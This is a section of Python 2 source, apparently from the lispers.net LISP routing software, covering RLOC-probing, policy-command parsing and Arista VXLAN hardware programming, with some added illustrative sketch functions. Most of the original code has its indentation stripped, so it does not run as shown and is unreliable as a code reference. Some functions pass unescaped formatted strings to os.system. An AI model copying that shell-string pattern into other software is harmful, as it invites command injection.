def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
    # return the instance-ID configured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
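#
# Editor's illustrative sketch (hypothetical reduced form): the multi-tenant
# selection above is a longest-prefix match. Given (mask_len, iid) tuples
# for the tenant prefixes a source EID already matched, pick the instance-ID
# behind the longest mask:
#
def lisp_example_longest_match(matched_candidates):
    best = None
    for mask_len, iid in matched_candidates:
        if (best == None or best[0] < mask_len): best = (mask_len, iid)
    #endfor
    return(None if best == None else best[1])
#enddef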
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-device (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for becomes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probing
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
glean, do_probe, y = lisp_allow_gleaning(eid, None, parent_rloc)
if (glean and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
            # same RLOC address but different translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
#
# Copy last-rloc send probe timer, so all EIDs using the
# same RLOC can have sync'ed rtts.
#
parent_rloc.last_rloc_probe = last_rloc.last_rloc_probe
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
                # Suppress sending RLOC-probe if we just received a nonce-echo
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
                astr = red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
            # Reinstall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
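#
# example_paced_send
#
# Illustrative sketch only (not part of lispers.net): a generalized form of
# the burst-and-sleep pacing pattern lisp_process_rloc_probe_timer() uses
# when sending RLOC-probes. All names here are hypothetical.
#
def example_paced_send(items, send, burst=10, pause=0.020):
    count = 0
    for item in items:
        send(item)
        count += 1
        if ((count % burst) == 0): time.sleep(pause)
    #endfor
    return
#enddef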
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
    # When the xtr-parameter indicates to register all RTRs, we are registering
    # unconditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
    # Check if the RTR address is in the RTR-list the lisp-itr process
    # learned from the map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_entry, source, port, map_reply, ttl,
mrloc):
rloc = rloc_entry.rloc
nonce = map_reply.nonce
hc = map_reply.hop_count
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
jt = rloc_entry.json.json_string if rloc_entry.json else None
ts = lisp_get_timestamp()
#
# If this RLOC-probe reply is in response to a RLOC-probe request to a
# multicast RLOC, then store all responses. Create a lisp_rloc() for new
# entries.
#
if (mrloc != None):
multicast_rloc = mrloc.rloc.print_address_no_iid()
if (mrloc.multicast_rloc_probe_list.has_key(map_reply_addr) == False):
            nrloc = copy.deepcopy(mrloc)
nrloc.rloc.copy_address(rloc)
nrloc.multicast_rloc_probe_list = {}
mrloc.multicast_rloc_probe_list[map_reply_addr] = nrloc
#endif
nrloc = mrloc.multicast_rloc_probe_list[map_reply_addr]
nrloc.last_rloc_probe_nonce = mrloc.last_rloc_probe_nonce
nrloc.last_rloc_probe = mrloc.last_rloc_probe
r, eid, group = lisp_rloc_probe_list[multicast_rloc][0]
nrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
mrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
return
#endif
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sending sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr):
if (rloc.translated_port != 0 and rloc.translated_port != port):
continue
#endif
#endif
rloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
    #endfor
return(count)
#enddef
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
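#
# example_format_macs_usage
#
# Illustrative usage only (not part of lispers.net): lisp_format_macs()
# expects two 12-hex-character MAC strings with no separators.
#
def example_format_macs_usage():
    #
    # Returns "0050-569a-3ceb -> 0050-5612-3456".
    #
    return(lisp_format_macs("0050569a3ceb", "005056123456"))
#enddef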
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
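#
# example_decode_dist_name_usage
#
# Illustrative usage only (not part of lispers.net): a distinguished-name is
# a NUL-terminated string embedded in the record.
#
def example_decode_dist_name_usage():
    packet, dist_name = lisp_decode_dist_name("xtr-1\0rest-of-record")
    #
    # packet is now "rest-of-record" and dist_name is "xtr-1".
    #
    return(dist_name)
#enddef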
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of multi-tuples, each ending
# with a lisp_packet (flow[3]). This function is called and run in its own
# thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
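#
# example_policy_kv_pair
#
# Illustrative sketch only (not part of lispers.net): the kv_pair passed to
# lisp_policy_command() keys each match parameter to an array with one slot
# per match clause. The "datetime-range" array length defines the number of
# clauses and empty strings mean "not specified in this clause". All values
# below are assumed, including the concatenated 19+19 character datetime
# format implied by the v[0:19]/v[19::] slicing above.
#
def example_policy_kv_pair():
    return({
        "policy-name" : "policy1",
        "datetime-range" : ["", "2019-01-01-00:00:002019-12-31-23:59:59"],
        "instance-id" : ["1", ""],
        "source-eid" : ["10.0.0.0/8", ""],
        "set-action" : "drop"
    })
#enddef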
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
    # Derive MAC address from VTEP address and associate it with the next-hop
    # address on vlan4094. This MAC address must be the MAC address on the
    # foreign VTEP configured with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
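#
# example_vtep_mac_mapping
#
# Illustrative sketch only (not part of lispers.net) of the algorithmic
# VTEP-address-to-MAC mapping described above: the low three octets of the
# RLOC, in hex, become the low three octets of the virtual-router MAC. For
# "10.1.2.3" this returns ("00:00:00:01:02:03", "0000.0001.0203").
#
def example_vtep_mac_mapping(rloc):
    o = [int(x) for x in rloc.split(".")]
    mac = "00:00:00:{:02x}:{:02x}:{:02x}".format(o[1], o[2], o[3])
    arista_mac = "0000.00{:02x}.{:02x}{:02x}".format(o[1], o[2], o[3])
    return(mac, arista_mac)
#enddef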
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list, lisp_gleaned_groups
global lisp_no_map_request_rate_limit
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Clear rate-limiting temporarily.
#
lisp_no_map_request_rate_limit = lisp_get_timestamp()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Clear gleaned groups data structure.
#
lisp_gleaned_groups = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulate it with a source-port of 4341
# and a destination address and port that were translated by the NAT. That
# information is in the lisp_nat_info() class.
#
